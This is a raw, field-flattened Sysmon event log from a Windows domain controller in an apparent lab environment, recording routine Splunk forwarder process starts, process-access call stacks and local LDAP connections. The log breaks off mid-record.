14:04:02.849{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202485Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202484Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202483Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E8D2-6040-264E-00000000AD01}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202482Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.849{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8D2-6040-264E-00000000AD01}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202481Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.850{5ABCFE62-E8D2-6040-264E-00000000AD01}5796C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202480Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61ACF4D8DC59E1CEAFAF689A571498A3,SHA256=C800FE3785D6976B16C35210F45F7DFB85C5DC21ABC1A9F9F6A85D84C49C1A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202479Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.240{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4055E9832531A346CCCDAA8B2A725982,SHA256=24D07875E56C67197362C1F74EC7EDBB9261764ED59C6B617117BA7D9A4A4019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202478Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.240{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C812760BFE4084A53C37DB8AC928515F,SHA256=A54641C85516C2E921D608946FE1743E9EF73AEEF919F686B9C23E9FF431C855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202477Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8D2-6040-254E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202476Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202475Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202474Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202473Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202472Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E8D2-6040-254E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202471Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.177{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8D2-6040-254E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202470Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.178{5ABCFE62-E8D2-6040-254E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202500Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.740{5ABCFE62-842D-603E-0B00-00000000AD01}6326192C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000002202499Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CF07396EBFF5F47B101DAA0C0A5F21B,SHA256=437B6D227DF3997BA0373C77DBA6AB707391B55CCFE5EB81D1AD39F3EEDE890D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202498Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.646{5ABCFE62-E8D3-6040-274E-00000000AD01}42805880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202497Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8D3-6040-274E-00000000AD01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202496Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202495Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202494Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202493Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202492Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E8D3-6040-274E-00000000AD01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202491Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.521{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8D3-6040-274E-00000000AD01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202490Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.522{5ABCFE62-E8D3-6040-274E-00000000AD01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202489Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:03.349{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4055E9832531A346CCCDAA8B2A725982,SHA256=24D07875E56C67197362C1F74EC7EDBB9261764ED59C6B617117BA7D9A4A4019,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202512Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.476{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-228.attackrange.local60641-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002202511Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.476{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60641-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002202510Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.469{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT 